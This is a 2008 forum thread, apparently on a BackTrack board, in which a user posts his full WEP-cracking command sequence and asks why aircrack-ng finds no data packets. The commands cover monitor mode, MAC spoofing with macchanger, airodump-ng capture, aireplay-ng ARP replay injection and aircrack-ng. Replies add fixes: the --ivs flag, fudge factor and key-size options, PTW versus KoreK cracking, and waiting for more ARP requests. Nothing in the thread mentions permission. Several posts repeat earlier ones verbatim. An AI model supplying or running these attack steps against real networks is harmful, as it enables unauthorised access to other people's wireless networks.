PDA

View Full Version : Aircrack ERROR


Ergin
05-16-2008, 07:12 AM
hello aircrack error Help me helpme
Wmware backtrack 3 beta Live Cd to use
Ralink usb wifi adaptor (rausb0) wep key aircrack error
aircrack-ng -n 64 --bssid 00:30:54:01:b1 dosya-01.cap
Oppenning dosya-01.cap
Got no data packets from target network! -------------------------------------->>>>>>ERROR
ne yapmam lazım bir yardımcı olurmusunuz kardeşler


picture see
İmage;

----->>>>> http: --------> : //img179.imageshack.us/my.php?image=hjjyww3.png

HELPME sory image;

İmage upload error

Quote:
You are only allowed to post URLs to other sites after you have made 15 post or more

http:------------->>>//s32.photobucket.com/player.sw...fs=1&os=1&ap=1 ------------------>>>> video the same way apply to follow xploitz thank I'm error

--------------------------------------------------------------------------------
Last edited by Ergin : Yesterday at 01:48 PM.
__________________________________________________ _____________________________
CODE:WEP KEY START

#airmon-ng stop rausb0
#ifconfig wifi0 down
#macchanger --mac xx:xx:xx:xx:xx wifi0
set decive name : no such decive -------------------->>>error
#macchanger --mac xx:xx:xx:xx:xx: rausb0
Current mac: xx:xx:xx:xx:xx
faked mac: xx:xx:xx:xx:xx:

#airmon-ng start rausb0

...............(monıtor anable mode)

#airodump-ng rausb0

............................(scan channel)
#airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump rausb0

......................(save ivs) write: dump

#aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
.....................(attack)
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets.............

..............................(Cracking)
#aircrack-ng -b 00:01:02:03:04:05 dump-01.cap
Oppenning dump-01.cap
Got no data packets from target network!------------------------->>>ERROR
:( :( :(

f3ntanil
05-16-2008, 08:47 AM
......................(save ivs) write: dump

#aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
.....................(attack)
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets.............

..............................(Cracking)
#aircrack-ng -b 00:01:02:03:04:05 dump-01.cap
Oppenning dump-01.cap
Got no data packets from target network!------------------------->>>ERROR
:( :( :(

It's hard to tell what's going on by your post, but let's assume you have captured a bunch of packets with airodump in a file called "dump"

Try keeping it simple with

aircrack-ng -z dump*.cap

Zacay
05-16-2008, 10:50 AM
I think you need more ARP requests.

ACIDPHYX
05-18-2008, 12:29 PM
If i am reading your problem correctly it seems to me that what you missing is if you are cracking WEP then you need to use the --ivs syntax in the airodump-ng when executing in the shell.

airodump-ng -w dump --band g --channel 11 rausb0

that will capture all data to a cap file but will not capture the weak IV's needed for cracking.

airodump-ng -w dump --ivs --band g --channel 11 rausb0

the extra --ivs syntax will tell airodump-ng to capture to a *.ivs file for use with aircrack-ng
Also when i run aircrack-ng i use the following arguments

aircrack-ng -f 2 -a 1 -n 128 -b $BSSID dump.ivs

That sets Fudge Factor 2 enabled WEP mode Cracking and sets cipher to 128 (of course that could be 64 to)

I hope that helps if you have any questions let me know.

Ergin
05-18-2008, 02:45 PM
thank you thank you
arp 1 ack 0 packet 0
thank you
good mornıg

samsung
05-18-2008, 06:45 PM
hello aircrack error Help me helpme
Wmware backtrack 3 beta Live Cd to use
Ralink usb wifi adaptor (rausb0) wep key aircrack error
aircrack-ng -n 64 --bssid 00:30:54:01:b1 dosya-01.cap
Oppenning dosya-01.cap
Got no data packets from target network! -------------------------------------->>>>>>ERROR
ne yapmam lazım bir yardımcı olurmusunuz kardeşler


picture see
İmage;

----->>>>> http: --------> : //img179.imageshack.us/my.php?image=hjjyww3.png

HELPME sory image;

İmage upload error

Quote:
You are only allowed to post URLs to other sites after you have made 15 post or more

http:------------->>>//s32.photobucket.com/player.sw...fs=1&os=1&ap=1 ------------------>>>> video the same way apply to follow xploitz thank I'm error

--------------------------------------------------------------------------------
Last edited by Ergin : Yesterday at 01:48 PM.
__________________________________________________ _____________________________
CODE:WEP KEY START

#airmon-ng stop rausb0
#ifconfig wifi0 down
#macchanger --mac xx:xx:xx:xx:xx wifi0
set decive name : no such decive -------------------->>>error
#macchanger --mac xx:xx:xx:xx:xx: rausb0
Current mac: xx:xx:xx:xx:xx
faked mac: xx:xx:xx:xx:xx:

#airmon-ng start rausb0

...............(monıtor anable mode)

#airodump-ng rausb0

............................(scan channel)
#airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump rausb0

......................(save ivs) write: dump

#aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
.....................(attack)
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets.............

..............................(Cracking)
#aircrack-ng -b 00:01:02:03:04:05 dump-01.cap
Oppenning dump-01.cap
Got no data packets from target network!------------------------->>>ERROR
:( :( :(

I can't view your video, but if you are only getting 1 ARP request then you need to wait a bit more, sometimes this can take between 1 min - 20 mins .... how long did you wait for? can you post an image of your aireplay-ng command, feel free to block your MAC, just need to see exactly what way you've typed it out & how long its been running for

bb_EcKo
05-18-2008, 07:35 PM
If i am reading your problem correctly it seems to me that what you missing is if you are cracking WEP then you need to use the --ivs syntax in the airodump-ng when executing in the shell.

airodump-ng -w dump --band g --channel 11 rausb0

that will capture all data to a cap file but will not capture the weak IV's needed for cracking.

airodump-ng -w dump --ivs --band g --channel 11 rausb0

the extra --ivs syntax will tell airodump-ng to capture to a *.ivs file for use with aircrack-ng
Also when i run aircrack-ng i use the following arguments

aircrack-ng -f 2 -a 1 -n 128 -b $BSSID dump.ivs

That sets Fudge Factor 2 enabled WEP mode Cracking and sets cipher to 128 (of course that could be 64 to)

I hope that helps if you have any questions let me know.

Don't want to say (type?) what you're saying is wrong, but if i recall correctly if you use --ivs, you cant use the ptw method in aircrack. But have to use korek method, which generally needs more captured packets and also takes longer to crack.

all in all, i don't recommend using the --ivs switch, unless you're strapped for hd space :D

ACIDPHYX
05-18-2008, 08:35 PM
I don't mean to argue but i know for a fact that using the --ivs switch will work with PTW because i crack WEP by running airodump w/ the --ivs switch and then while it's collecting packets i use aircrack-ng against the .ivs file
"aircrack-ng -f 2 -a 1 -n 128 filename.ivs"
and it runs for a second and then switchs to PTW and runs taht way over and over again until enough have been captured and then cracks. I restarts Evertime 5000 more IVS are captured.

Again not to start an arguement but i guarantee it!

balding_parrot
05-18-2008, 10:04 PM
To put an end to this --ivs switch argument with PTW.
The original versions DID NOT allow the --ivs switch.
The PTW versions starting from almost a year ago DO ALLOW the use of the --ivs switch.

So you are both right or wrong whichever way you want to look at it, depending on the version you are using.

bb_EcKo
05-19-2008, 12:55 PM
To put an end to this --ivs switch argument with PTW.
The original versions DID NOT allow the --ivs switch.
The PTW versions starting from almost a year ago DO ALLOW the use of the --ivs switch.

So you are both right or wrong whichever way you want to look at it, depending on the version you are using.

learn something new every day ^^

ACIDPHYX
05-20-2008, 12:53 AM
learn something new every day ^^

Yes thank you very my for clarifying that for me i was aware of that version differential. and bb_EcKo is right. You learn something new everyday.

balding_parrot
05-20-2008, 07:34 PM
As long as you learn something from it, it wasn't a waste of time.

Well that's the way I look these things. ;)